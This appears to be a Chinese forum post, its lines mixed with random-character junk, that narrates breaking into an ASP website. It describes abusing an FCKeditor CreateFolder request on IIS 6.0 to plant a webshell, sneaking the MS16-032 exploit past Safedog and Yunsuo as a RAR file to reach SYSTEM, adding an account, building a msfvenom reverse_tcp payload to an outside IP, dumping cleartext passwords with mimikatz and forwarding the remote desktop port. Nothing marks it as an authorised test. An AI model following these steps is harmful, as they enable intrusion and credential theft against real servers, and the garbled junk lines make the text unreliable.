|
+ z6 F& a' z9 x2 [' M* v
/ W2 K% z0 s, Q! Y, c' O
! C8 h' m: P- R" e) H8 Q
# z! N8 e+ @/ D
|
5 O% j& m9 g3 i& B: f. d' T 6 \, ?& u% ^7 {& Y$ v
7 ] A5 B1 B% u) ]( D1 |1 E1 m一、 利用getwebshell篇 4 ^* \+ p4 O# \8 t
/ k. l3 X0 g8 K4 t8 G+ D
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
+ k- Z- k0 ]: ~# D) U
6 P( B3 m! m' I4 e8 A1 n& H ) E" c! k& s$ F. I% N
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 8 T! r2 E$ p6 B3 f$ ~3 k+ V/ t
 ~9 f: C" I- ?7 h+ G( W9 K# b# Y7 d
下面我们构造一个asp目录,如: * ]; u+ O2 q9 y/ S% b: Z; H
! K& r' S. a+ S9 ` R3 f
( Y i) z6 w. V$ m8 g( Z http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 1 ~8 Y Z0 c/ n# s8 k
2 o' U* Y0 b' Q
8 q' X8 N" T9 c# x# X& {$ |+ O 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 8 |" L/ Q3 u1 z4 [$ c
& b2 q; e$ e% a' w一、 绕过安全狗云锁提权并且加账号
& Z& I- i' h+ }1 N7 H : N a1 o% f: [) y0 K8 K/ \5 ~
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
+ T z' z, e5 Z . }5 {6 _# E0 v0 m# A
如图:
' e, a% k; }5 R7 A
, I. R3 j% R Z |- s然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
6 b% K: p- M" n! {1 p
4 B! O% [1 }8 \; ]; j0 s一、 利用metasploit / [ [2 R- t1 U9 w/ v' ~; B, o; L
' e) q7 t8 h% a
首先用pentestbox生成一个64位的payload如下命令 + M3 b' Z {7 A6 n: n5 M
. `2 E+ S7 z8 F% u. BmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe ( C" A4 z; j' U
0 O1 t0 q1 R+ {. a4 f. E为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
" w! y# \4 w; F, y+ h
8 P6 g7 F" J. r5 o5 W9 z2 ^下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
$ s# z0 S" {! }1 E; v% l( i3 D7 [6 A( ]
2 k* h! N0 r1 ^: g5 _% g/ l5 P, X1 M下面我们来做一个监听如下命令:
5 N! i8 R+ ^, i, e
" f6 Q. ?& @! r8 l: Q/ p! c8 ~ Qportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
, r5 k* n! v j; Y/ J' S7 n) f
$ n: [0 x2 F% P6 ^3 s : f) x. }" Y5 \2 j
| " v$ p* s5 K" o) E/ O l3 r" }" w
- Y- P: Q1 ~8 c: p6 P6 A" v / _) d9 _% O- _% S) d! @
& t4 \+ D! G3 Q4 m& ?1 W+ }2 h" v/ i* N4 X) k
* y% V$ Q- z) z" I8 u6 c' y ; d( T' K3 h6 D$ }+ W Y! _
) R9 ~: m" Y8 h7 A7 i5 E$ C " B9 Q1 ` l7 ^) E
0 E8 I' N7 y: B6 {# o9 S* c! ]
3 v4 v, V# _6 v: l/ i7 R0 y$ x) ]
5 G- V1 l- V% l$ _; `4 j- }+ J* g5 P1 n( o# C2 J, L
8 g+ Y2 C. M3 D5 ?. [9 L3 Q |